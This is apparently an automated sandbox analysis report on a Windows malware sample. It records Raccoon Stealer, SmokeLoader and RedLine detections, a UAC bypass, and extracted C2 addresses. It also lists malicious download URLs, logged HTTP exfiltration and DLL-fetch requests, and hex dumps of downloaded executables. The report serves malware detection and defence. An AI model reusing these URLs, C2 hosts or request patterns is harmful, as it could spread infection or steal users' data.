Windows Analysis Report Md0q201V1D.exe

AV Detection:

Yara detected Raccoon Stealer

Source: Yara match	File source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR

Antivirus detection for URL or domain

Source: http://sysaheu90.top/game.exe	Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe	Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept	Avira URL Cloud: Label: malware
Source: http://xacokuo8.top/	Avira URL Cloud: Label: malware
Source: http://hajezey1.top/	Avira URL Cloud: Label: malware
Source: http://znpst.top/dl/buildz.exe	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp	Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://xacokuo8.top/", "http://hajezey1.top/"]}
Source: 24.2.B096.exe.4446e20.2.raw.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["45.9.20.149:10844"], "Bot Id": ""}

Multi AV Scanner detection for domain / URL

Source: http://sysaheu90.top/game.exe

Virustotal: Detection: 16%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\CAC5.exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\CD17.exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\D8D0.exe	ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	ReversingLabs: Detection: 42%

Machine Learning detection for sample

Source: Md0q201V1D.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 19.0.21.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.21.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.21.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.21.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 24.2.B096.exe.653a840.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.B096.exe.653a840.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.B096.exe.5f90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.B096.exe.5f90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.520563950.0000000006381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.519980779.0000000005F90000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B096.exe PID: 6404, type: MEMORYSTR

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49826 version: TLS 1.0

Uses 32bit PE files

Source: Md0q201V1D.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Uses new MSVCR Dlls

Source: C:\Users\user\AppData\Local\Temp\CBF0.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.3:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50104 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50105 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:50111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50127 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.160.132:443 -> 192.168.2.3:50130 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50141 version: TLS 1.2

Binary contains paths to debug symbols

Source:	Binary string: C:\vojos\fuw.pdb source: CBF0.exe, 0000001D.00000002.451970656.0000000000417000.00000002.00020000.sdmp, bhhudtb.10.dr
Source:	Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: EBBE.exe.10.dr
Source:	Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: E64F.exe.10.dr
Source:	Binary string: dC:\fudijub.pdb` source: Md0q201V1D.exe
Source:	Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: E64F.exe.10.dr
Source:	Binary string: C:\lewusukoviv.pdb source: C8FE.exe.10.dr
Source:	Binary string: C:\yut\pabebanejupo12 f.pdb` source: C066.exe.10.dr
Source:	Binary string: C:\fudijub.pdb source: Md0q201V1D.exe
Source:	Binary string: wntdll.pdbUGP source: CBF0.exe, 0000001D.00000002.461326417.000000006B521000.00000020.00020000.sdmp, 1105.tmp.29.dr
Source:	Binary string: wntdll.pdb source: CBF0.exe, 1105.tmp.29.dr
Source:	Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: EBBE.exe.10.dr
Source:	Binary string: C:\tosofom\yopuk.pdb source: CAC5.exe.10.dr
Source:	Binary string: C:\lewusukoviv.pdb` source: C8FE.exe.10.dr
Source:	Binary string: C:\yut\pabebanejupo12 f.pdb source: C066.exe.10.dr
Source:	Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb` source: C295.exe.10.dr
Source:	Binary string: d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb source: F11E.exe.10.dr
Source:	Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb source: C295.exe.10.dr

Spreading:

Enumerates the file system

Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:50078 -> 194.180.174.181:80
Source: Traffic	Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:50078 -> 194.180.174.181:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe	Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe	Domain query: znpst.top
Source: C:\Windows\explorer.exe	Network Connect: 216.128.137.31 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe	Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe	Domain query: hajezey1.top
Source: C:\Windows\explorer.exe	Domain query: sysaheu90.top

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 2.56.214.190 ports 2,5,6,8,9,59628

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://xacokuo8.top/
Source: Malware configuration extractor	URLs: http://hajezey1.top/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.181
Source: global traffic	HTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic	HTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a65 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic	HTTP traffic detected: POST /936 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 2068Host: 194.180.174.181
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /706 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 5611Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 118349Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cache

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 12:09:41 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 12:09:02 GMTETag: "54a00-5cf7cb1650dd7"Accept-Ranges: bytesContent-Length: 346624Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 16 a1 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 cc 03 00 00 c0 70 02 00 00 00 00 20 cb 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 74 02 00 04 00 00 10 4a 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 cf 03 00 64 00 00 00 00 60 73 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 73 02 90 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 bf 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 cb 03 00 00 10 00 00 00 cc 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 e0 03 00 00 16 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 61 6c 65 00 00 00 e5 02 00 00 00 50 73 02 00 04 00 00 00 e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 60 73 02 00 3c 00 00 00 ea 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 a0 73 02 00 24 01 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 12:10:20 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 12:10:03 GMTETag: "92e00-5cf7cb5008bf2"Accept-Ranges: bytesContent-Length: 601600Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c0 ec 51 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 b0 07 00 00 c0 70 02 00 00 00 00 20 ae 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 7a 4c 09 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 b2 07 00 64 00 00 00 00 40 77 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 98 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 a2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 ae 07 00 00 10 00 00 00 b0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 c0 07 00 00 16 00 00 00 b4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 75 78 61 74 00 00 e5 02 00 00 00 30 77 02 00 04 00 00 00 ca 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 40 77 02 00 3c 00 00 00 ce 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 80 77 02 00 24 01 00 00 0a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:10:52 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 12:10:58 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Fri, 29 Oct 2021 12:10:02 GMTETag: "d6200-5cf7cb4ef9326"Accept-Ranges: bytesContent-Length: 877056Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 